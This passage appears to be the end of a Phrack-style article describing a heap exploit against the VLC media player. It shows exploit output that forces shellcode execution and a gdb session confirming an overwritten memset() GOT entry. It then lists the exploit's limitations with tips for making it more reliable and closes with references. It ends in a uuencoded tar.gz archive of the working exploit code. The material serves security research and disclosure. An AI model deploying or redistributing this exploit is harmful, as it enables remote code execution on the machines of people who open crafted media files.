+0x289fcec0...0x289fcf00...0x289fcf40...0x289fcf80...0x289fcfc0...
+0x289fd080...0x289fd0c0...0x289fd100...0x289fd140...0x289fd180...
+0x289fd3c0...0x289fd400...0x289fd440...0x289fd480...0x289fd4c0...
+0x289fd500...0x289fd540...0x289fd580...0x289fd5c0...0x289fd600...
+0x289fd640...0x289fd680...0x289fd6c0...0x289fd700...0x289fd740...
+0x289fd780...0x289fd7c0...0x289fd800...0x289fd840...0x289fd880...
+0x289fd8c0...0x289fd900...0x289fd940...0x289fd980...0x289fd9c0...
+0x289fda00...0x289fda40...0x289fda80...0x289fdac0...0x289fdb00...
+0x289fdb40...0x289fdb80...0x289fdbc0...0x289fdc00...0x289fdc40...
+0x289fdc80...0x289fdcc0...0x289fdd00...0x289fdd40...0x289fdd80...
+0x289fddc0...0x289fde00...0x289fde40...0x289fde80...0x289fdec0...
+0x289fdf00...0x289fdf40...0x289fdf80...0x289fdfc0...0x289fe080...
+0x289fe0c0...0x289fe100...0x289fe140...0x289fe180...0x289fe1c0...
+0x289fe200...0x289fe240...0x289fe280...0x289fe2c0...0x289fe300...
+0x289fe340...0x289fe380...0x289fe3c0...0x289fe400...0x289fe440...
+0x289fe480...0x289fe4c0...0x289fe500...0x289fe540...0x289fe580...
+0x289fe5c0...0x289fe600...0x289fe640...0x289fe680...0x289fe6c0...
+0x289fe700...0x289fe740...0x289fe780...0x289fe7c0...0x289fe800...
+0x289fe840...0x289fe880...0x289fe8c0...0x289fe900...0x289fe940...
+0x289fe980...0x289fe9c0...0x289fea00...0x289fea40...0x289fea80...
+0x289feac0...0x289feb00...0x289feb40...0x289feb80...0x289febc0...
+0x289fec00...0x289fec40...0x289fec80...0x289fecc0...0x289fed00...
+0x289fed40...0x289fed80...0x289fedc0...0x289fee00...0x289fee40...
+0x289fee80...0x289feec0...0x289fef00...0x289fef40...0x289fef80...
+0x289fefc0...0x28b32080...0x28b320c0...0x28b32100...0x28b32140...
+0x28b32180...0x28b321c0...0x28b32200...0x28b32240...0x28b32280...
+0x28b322c0...0x28b32300...0x28b32340...0x28b32380...0x28b323c0...
+0x28b32400...0x28b32440...0x28b32480...0x28b324c0...0x28b32500...
+0x28b32540...0x28b32580...0x28b325c0...0x28b32600...0x28b32640...
+0x28b32680...0x28b326c0...0x28b32700...0x28b32740...0x28b32780...
+0x28b327c0...0x28b32800...0x28b32840...0x28b32880...0x28b328c0...
+0x28b32900...0x28b32940...0x28b32980...0x28b329c0...0x28b32a00...
+0x28b32a40...0x28b32a80...0x28b32ac0...0x28b32b00...0x28b32b40...
+0x28b32b80...0x28b32bc0...0x28b32c00...0x28b32c40...0x28b32c80...
+0x28b32cc0...0x28b32d00...0x28b32d40...0x28b32d80...0x28b32dc0...
+0x28b32e00...0x28b32e40...0x28b32e80...0x28b32ec0...0x28b32f00...
+0x28b32f40...0x28b32f80...0x28b32fc0...0x28b33080...0x28b330c0...
+0x28b33100...0x28b33140...0x28b33180...0x28b331c0...0x28b33200...
+0x28b33240...0x28b33280...0x28b332c0...0x28b33300...0x28b33340...
+0x28b33380...0x28b333c0...0x28b33400...0x28b33440...0x28b33480...
+0x28b334c0...0x28b33500...0x28b33540...0x28b33580...0x28b335c0...
+0x28b33600...0x28b33640...0x28b33680...0x28b336c0...0x28b33700...
+0x28b33740...0x28b33780...0x28b337c0...0x28b33800...0x28b33840...
+0x28b33880...0x28b338c0...0x28b33900...0x28b33940...0x28b33980...
+0x28b339c0...0x28b33a00...0x28b33a40...0x28b33a80...0x28b33ac0...
+0x28b33b00...0x28b33b40...0x28b33b80...0x28b33bc0...0x28b33c00...
+0x28b33c40...0x28b33c80...0x28b33cc0...0x28b33d00...0x28b33d40...
+0x28b33d80...0x28b33dc0...0x28b33e00...0x28b33e40...0x28b33e80...
+0x28b33ec0...0x28b33f00...0x28b33f40...0x28b33f80...0x28b33fc0...
+0x28b34080...0x28b340c0...0x28b34100...0x28b34140...0x28b34180...
+0x28b341c0...0x28b34200...0x28b34240...0x28b34280...0x28b342c0...
+0x28b34300...0x28b34340...0x28b34380...0x28b343c0...0x28b34400...
+0x28b34440...0x28b34480...0x28b344c0...0x28b34500...0x28b34540...
+0x28b34580...0x28b345c0...0x28b34600...0x28b34640...0x28b34680...
+0x28b346c0...0x28b34700...0x28b34740...0x28b34780...0x28b347c0...
+0x28b34800...0x28b34840...0x28b34880...0x28b348c0...0x28b34900...
+0x28b34940...0x28b34980...0x28b349c0...0x28b34a00...0x28b34a40...
+0x28b34a80...0x28b34ac0...0x28b34b00...0x28b34b40...0x28b34b80...
+0x28b34bc0...0x28b34c00...0x28b34c40...0x28b34c80...0x28b34cc0...
+0x28b34d00...0x28b34d40...0x28b34d80...0x28b34dc0...0x28b34e00...
+0x28b34e40...0x28b34e80...0x28b34ec0...0x28b34f00...0x28b34f40...
+0x28b34f80...0x28b34fc0...0x28b36080...0x28b360c0...0x28b36100...
+0x28b36140...0x28b36180...0x28b361c0...0x28b36200...0x28b36240...
+0x28b36280...0x28b362c0...0x28b36300...0x28b36340...0x28b36380...
+0x28b363c0...0x28b36400...0x28b36440...0x28b36480...0x28b364c0...
+0x28b36500...0x28b36540...0x28b36580...0x28b365c0...0x28b36600...
+0x28b36640...0x28b36680...0x28b366c0...0x28b36700...0x28b36740...
+0x28b36780...0x28b367c0...0x28b36800...0x28b36840...0x28b36880...
+0x28b368c0...0x28b36900...0x28b36940...0x28b36980...0x28b369c0...
+0x28b36a00...0x28b36a40...0x28b36a80...0x28b36ac0...0x28b36b00...
+0x28b36b40...0x28b36b80...0x28b36bc0...0x28b36c00...0x28b36c40...
+0x28b36c80...0x28b36cc0...0x28b36d00...0x28b36d40...0x28b36d80...
+0x28b36dc0...0x28b36e00...0x28b36e40...0x28b36e80...0x28b36ec0...
+0x28b36f00...0x28b36f40...0x28b36f80...0x28b36fc0...0x28b37080...
+0x28b370c0...0x28b37100...0x28b37140...0x28b37180...0x28b371c0...
+0x28b37200...0x28b37240...0x28b37280...0x28b372c0...0x28b37300...
+0x28b37340...0x28b37380...0x28b373c0...0x28b37400...0x28b37440...
+0x28b37480...0x28b374c0...0x28b37500...0x28b37540...0x28b37580...
+0x28b375c0...0x28b37600...0x28b37640...0x28b37680...0x28b376c0...
+0x28b37700...0x28b37740...0x28b37780...0x28b377c0...0x28b37800...
+0x28b37840...0x28b37880...0x28b378c0...0x28b37900...0x28b37940...
+0x28b37980...0x28b379c0...0x28b37a00...0x28b37a40...0x28b37a80...
+0x28b37ac0...0x28b37b00...0x28b37b40...0x28b37b80...0x28b37bc0...
+0x28b37c00...0x28b37c40...0x28b37c80...0x28b37cc0...0x28b37d00...
+0x28b37d40...0x28b37d80...0x28b37dc0...0x28b37e00...0x28b37e40...
+0x28b37e80...0x28b37ec0...0x28b37f00...0x28b37f40...0x28b37f80...
+0x28b37fc0...0x28b38080...0x28b380c0...0x28b38100...0x28b38140...
+0x28b38180...0x28b381c0...0x28b38200...0x28b38240...0x28b38280...
+0x28b382c0...0x28b38300...0x28b38340...0x28b38380...0x28b383c0...
+0x28b38400...0x28b38440...0x28b38480...0x28b384c0...0x28b38500...
+0x28b38540...0x28b38580...0x28b385c0...0x28b38600...0x28b38640...
+0x28b38680...0x28b386c0...0x28b38700...0x28b38740...0x28b38780...
+0x28b387c0...0x28b38800...0x28b38840...0x28b38880...0x28b388c0...
+0x28b38900...0x28b38940...0x28b38980...0x28b389c0...0x28b38a00...
+0x28b38a40...0x28b38a80...0x28b38ac0...0x28b38b00...0x28b38b40...
+0x28b38b80...0x28b38bc0...0x28b38c00...0x28b38c40...0x28b38c80...
+0x28b38cc0...0x28b38d00...0x28b38d40...0x28b38d80...0x28b38dc0...
+0x28b38e00...0x28b38e40...0x28b38e80...0x28b38ec0...0x28b38f00...
+0x28b38f40...0x28b38f80...0x28b38fc0...0x28b39080...0x28b390c0...
+0x28b39100...0x28b39140...0x28b39180...0x28b391c0...0x28b39200...
+0x28b39240...0x28b39280...0x28b392c0...0x28b39300...0x28b39340...
+0x28b39380...0x28b393c0...0x28b39400...0x28b39440...0x28b39480...
+0x28b394c0...0x28b39500...0x28b39540...0x28b39580...0x28b395c0...
+0x28b39600...0x28b39640...0x28b39680...0x28b396c0...0x28b39700...
+0x28b39740...0x28b39780...0x28b397c0...0x28b39800...0x28b39840...
+0x28b39880...0x28b398c0...0x28b39900...0x28b39940...0x28b39980...
+0x28b399c0...0x28b39a00...0x28b39a40...0x28b39a80...0x28b39ac0...
+0x28b39b00...0x28b39b40...0x28b39b80...0x28b39bc0...0x28b39c00...
+0x28b39c40...0x28b39c80...0x28b39cc0...0x28b39d00...0x28b39d40...
+0x28b39d80...0x28b39dc0...0x28b39e00...0x28b39e40...0x28b39e80...
+0x28b39ec0...0x28b39f00...0x28b39f40...0x28b39f80...0x28b39fc0...
+0x28b3a080...0x28b3a0c0...0x28b3a100...0x28b3a140...0x28b3a180...
+0x28b3a1c0...0x28b3a200...0x28b3a240...0x28b3a280...0x28b3a2c0...
+0x28b3a300...0x28b3a340...0x28b3a380...0x28b3a3c0...0x28b3a400...
+0x28b3a440...0x28b3a480...0x28b3a4c0...0x28b3a500...0x28b3a540...
+0x28b3a580...0x28b3a5c0...0x28b3a600...0x28b3a640...0x28b3a680...
+0x28b3a6c0...0x28b3a700...0x28b3a740...0x28b3a780...0x28b3a7c0...
+0x28b3a800...0x28b3a840...0x28b3a880...0x28b3a8c0...0x28b3a900...
+0x28b3a940...0x28b3a980...0x28b3a9c0...0x28b3aa00...0x28b3aa40...
+0x28b3aa80...0x28b3aac0...0x28b3ab00...0x28b3ab40...0x28b3ab80...
+0x28b3abc0...0x28b3ac00...0x28b3ac40...0x28b3ac80...0x28b3acc0...
+0x28b3ad00...0x28b3ad40...0x28b3ad80...0x28b3adc0...0x28b3ae00...
+0x28b3ae40...0x28b3ae80...0x28b3aec0...0x28b3af00...0x28b3af40...
+0x28b3af80...0x28b3afc0...0x28b3b080...0x28b3b0c0...0x28b3b100...
+0x28b3b140...0x28b3b180...0x28b3b1c0...0x28b3b200...0x28b3b240...
+0x28b3b280...0x28b3b2c0...0x28b3b300...0x28b3b340...0x28b3b380...
+0x28b3b3c0...0x28b3b400...0x28b3b440...0x28b3b480...0x28b3b4c0...
+0x28b3b500...0x28b3b540...0x28b3b580...0x28b3b5c0...0x28b3b600...
+0x28b3b640...0x28b3b680...0x28b3b6c0...0x28b3b700...0x28b3b740...
+0x28b3b780...0x28b3b7c0...0x28b3b800...0x28b3b840...0x28b3b880...
+0x28b3b8c0...0x28b3b900...0x28b3b940...0x28b3b980...0x28b3b9c0...
+0x28b3ba00...0x28b3ba40...0x28b3ba80...0x28b3bac0...0x28b3bb00...
+0x28b3bb40...0x28b3bb80...0x28b3bbc0...0x28b3bc00...0x28b3bc40...
+0x28b3bc80...0x28b3bcc0...0x28b3bd00...0x28b3bd40...0x28b3bd80...
+0x28b3bdc0...0x28b3be00...0x28b3be40...0x28b3be80...0x28b3bec0...
+0x28b3bf00...0x28b3bf40...0x28b3bf80...0x28b3bfc0...0x28bac080...
+0x28bac0c0...0x28bac100...0x28bac140...0x28bac180...0x28bac1c0...
+0x28bac200...0x28bac240...0x28bac280...0x28bac2c0...0x28bac300...
+0x28bac340...0x28bac380...0x28bac3c0...0x28bac400...0x28bac440...
+0x28bac480...0x28bac4c0...0x28bac500...0x28bac540...0x28bac580...
+0x28bac5c0...0x28bac600...0x28bac640...0x28bac680...0x28bac6c0...
+0x28bac700...0x28bac740...0x28bac780...0x28bac7c0...0x28bac800...
+0x28bac840...0x28bac880...0x28bac8c0...0x28bac900...0x28bac940...
+0x28bac980...0x28bac9c0...0x28baca00...0x28baca40...0x28baca80...
+0x28bacac0...0x28bacb00...0x28bacb40...0x28bacb80...0x28bacbc0...
+0x28bacc00...0x28bacc40...0x28bacc80...0x28baccc0...0x28bacd00...
+0x28bacd40...0x28bacd80...0x28bacdc0...0x28bace00...0x28bace40...
+0x28bace80...0x28bacec0...0x28bacf00...0x28bacf40...0x28bacf80...
+0x28bacfc0...0x28bad080...0x28bad0c0...0x28bad100...0x28bad140...
+0x28bad180...0x28bad1c0...0x28bad200...0x28bad240...0x28bad280...
+0x28bad2c0...0x28bad300...0x28bad340...0x28bad380...0x28bad3c0...
+0x28bad400...0x28bad440...0x28bad480...0x28bad4c0...0x28bad500...
+0x28bad540...0x28bad580...0x28bad5c0...0x28bad600...0x28bad640...
+0x28bad680...0x28bad6c0...0x28bad700...0x28bad740...0x28bad780...
+0x28bad7c0...0x28bad800...0x28bad840...0x28bad880...0x28bad8c0...
+0x28bad900...0x28bad940...0x28bad980...0x28bad9c0...0x28bada00...
+0x28bada40...0x28bada80...0x28badac0...0x28badb00...0x28badb40...
+0x28badb80...0x28badbc0...0x28badc00...0x28badc40...0x28badc80...
+0x28badcc0...0x28badd00...0x28badd40...0x28badd80...0x28baddc0...
+0x28bade00...0x28bade40...0x28bade80...0x28badec0...0x28badf00...
+0x28badf40...0x28badf80...0x28badfc0...0x28bae080...0x28bae0c0...
+0x28bae100...0x28bae140...0x28bae180...0x28bae1c0...0x28bae200...
+0x28bae240...0x28bae280...0x28bae2c0...0x28bae300...0x28bae340...
+0x28bae380...0x28bae3c0...0x28bae400...0x28bae440...0x28bae480...
+0x28bae4c0...0x28bae500...0x28bae540...0x28bae580...0x28bae5c0...
+0x28bae600...0x28bae640...0x28bae680...0x28bae6c0...0x28bae700...
+0x28bae740...0x28bae780...0x28bae7c0...0x28bae800...0x28bae840...
+0x28bae880...0x28bae8c0...0x28bae900...0x28bae940...0x28bae980...
+0x28bae9c0...0x28baea00...0x28baea40...0x28baea80...0x28baeac0...
+0x28baeb00...0x28baeb40...0x28baeb80...0x28baebc0...0x28baec00...
+0x28baec40...0x28baec80...0x28baecc0...0x28baed00...0x28baed40...
+0x28baed80...0x28baedc0...0x28baee00...0x28baee40...0x28baee80...
+0x28baeec0...0x28baef00...0x28baef40...0x28baef80...0x28baefc0...
+0x28baf080...0x28baf0c0...0x28baf100...0x28baf140...0x28baf180...
+0x28baf1c0...0x28baf200...0x28baf240...0x28baf280...0x28baf2c0...
+0x28baf300...0x28baf340...0x28baf380...0x28baf3c0...0x28baf400...
+0x28baf440...0x28baf480...0x28baf4c0...0x28baf500...0x28baf540...
+0x28baf580...0x28baf5c0...0x28baf600...0x28baf640...0x28baf680...
+0x28baf6c0...0x28baf700...0x28baf740...0x28baf780...0x28baf7c0...
+0x28baf800...0x28baf840...0x28baf880...0x28baf8c0...0x28baf900...
+0x28baf940...0x28baf980...0x28baf9c0...0x28bafa00...0x28bafa40...
+0x28bafa80...0x28bafac0...0x28bafb00...0x28bafb40...0x28bafb80...
+0x28bafbc0...0x28bafc00...0x28bafc40...0x28bafc80...0x28bafcc0...
+0x28bafd00...0x28bafd40...0x28bafd80...0x28bafdc0...0x28bafe00...
+0x28bafe40...0x28bafe80...0x28bafec0...0x28baff00...0x28baff40...
+0x28baff80...0x28baffc0...ok
+[~] Forcing shellcode execution
+[~] Playing MP4 file 1 times
+.ok
+[~] Done
+
+
+The console on the other side looks like the following:
+
+
+Program received signal SIGTRAP, Trace/breakpoint trap.
+0x28919b01 in ?? ()
+
+
+The exploit output informs us that the .got entry for memset() lies
+at 0x284edea8. Let's verify...
+
+
+(gdb) x/4bx 0x284edea8
+0x284edea8:     0x00    0x9b    0x91    0x28
+(gdb) x/i 0x28919b00
+   0x28919b00:  int3
+
+
+Obviously, it has been overwritten with the pointer to our ASM
+instructions. The 'SIGTRAP' informs us that EIP landed on top of them.
+
+
+(gdb) quit
+A debugging session is active.
+
+        Inferior 1 [process 2078] will be killed.
+
+Quit anyway? (y or n) y
+
+
+If you decide no to use gdb (that's what real men do), the following
+message will pop up upon successful exploitation.
+
+
+Trace/BPT trap: 5 (core dumped)
+
+
+--[ 7 - Limitations
+
+As we promised, we will give a list of the factors that limit our
+exploit's reliability. People interested in improving our code should
+first have a look below.
+
+1 - Back in the section we analyzed the RMF vulnerability, we said that
+the memory range we want leaked, is trashed with 'i_frame_size' bytes;
+in our exploit code we use a frame size of 20, so, 20 bytes end up being
+written at the target address. Apparently, because of this trashing of the
+target memory, we cannot leak .text or any other read only mapping from
+the target application, since attempting to write on it will terminate
+VLC with a segmentation violation. Quick tests show that we cannot somehow
+set 'i_frame_size' to 0 so that 'memcpy()' becomes a nop. Nevertheless,
+the interested reader is advised to analyze this further and find a way
+to bypass this limitation.
+
+  Note: Recall the RMF vulnerability; a function pointer overwrite is
+  possible. Managing to leak .text addresses means you can do automated
+  remote ROP gadget harvesting in order to write a reliable exploit ;)
+
+2 - For some reason we are not aware of, requesting a memory leak of
+more than 8MB returns no data at all. Maybe this is related to the output
+filters splitting the 'p_blocks' in smaller parts, or maybe not ;p This
+is a very important limitation, since smaller leaked data chunks means
+more requests for leaked memory which in turn implies more memory being
+trashed. Consequently, more data we shouldn't touch may be modified
+resulting in an unexpected crash of VLC.
+
+3 - Unfortunately, there's at least one logical bug within VLC;
+a logical bug related to input buffering and the clients receiving
+network streams. When we have some free time we may report it to the VLC
+developers :p More logical bugs that confine the exploitation process'
+reliability may be present. A reliable one shot exploit requires a
+harder study of VLC's source code (yeah, as if we have nothing better
+to deal with).
+
+4 - The exploit assumes that 64-byte regions usually lie between 0x28700000
+and 0x28e00000 and tries to locate them. Some times the heap extends
+beyond that range. We have to find a way to figure this out, get the
+topmost heap address and explore the whole region. Doing that in a
+reliable way requires problem 2 to be solved first.
+
+5 - In section 5.2 we analyzed how the 'p_root' candidates are located. The
+process described in the aforementioned section takes into account only the
+bins of the first arena, but VLC, being a multithreaded application,
+initializes more than one. We believe it's possible to detect those extra
+arenas, locate their bin-64 addresses and take them into account as well.
+Alternatively, one may leak and analyze the TLS data of each thread thus
+locating their magazine racks, their magazines and the 'rounds[]' array
+corresponding to 64-byte regions.
+
+6 - In step 6 of section 5.2 we said that all regions of the detected runs
+will eventually be freed by our special MP4 file in hope that 'p_root' will
+lie somewhere within them. Although we do our best to fill heap holes, this
+process may result in a segmentation fault due to the fact that regions
+already freed are freed for a second time. It is possible to avoid this by
+having a look at the target runs' region bitmap and freeing only those
+regions that seem to be allocated. We didn't have the time to implement
+this but we believe it's trivial (take a look at the comments in the 
+exploit's 'main.py').
+
+If you manage to solve any of these problems, please let us know; don't
+be a greedy pussy ;)
+
+
+--[ 8 - Final words
+
+Exploit development is definitely a hard task; Do you think that the money
+offered by [censored] is worth the trouble?
+
+In this article, which is short compared to our efforts during the exploit
+development, we tried to give as much detail as possible. Unfortunately
+there's no way for us to present every minor detail; a deeper look into
+VLC's source code is required. All that jemalloc stuff was fun but
+tiresome. We think it's about time we take some time off :) We would like
+to thank the Phrack staff for being the Phrack staff, our grhack.net
+colleagues and all our friends that still keep it real. Our work is
+dedicated to all those 'producers' of the security ecosystem that keep
+their mouth shut and put their brains to work. Love, peace and lots of #.
+
+
+--[ 9 - References
+
+[1] vl4d1m1r of ac1db1tch3z, The art of exploitation: Autopsy of cvsxpl
+    http://www.phrack.org/issues.html?issue=64&id=15&mode=txt
+
+[2] Feline Menace, Technical analysis of Samba WINS stack overflow
+    http://www.phrack.org/issues.html?issue=65&id=12&mode=txt
+
+[3] GOBBLES, Local/remote mpg123 exploit
+    http://www.securityfocus.com/archive/1/306476
+
+[4] VLC Security Advisory 1103
+    http://www.videolan.org/security/sa1103.html
+
+[5] Chapter 4. Examples for advanced use of VLC's stream output
+    (transcoding, multiple streaming, etc...)
+    http://www.videolan.org/doc/streaming-howto/en/ch04.html
+
+[6] VLC Security Advisory 1105
+    http://www.videolan.org/security/sa1105.html
+
+[7] RealAudio
+    http://en.wikipedia.org/wiki/RealAudio
+
+[8] RealAudio sipr
+    http://wiki.multimedia.cx/index.php?title=RealAudio_sipr
+
+
+--[ 10 - T3h l337 c0d3z
+
+begin 644 vlc_lulz_v0.1.tar.gz
+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
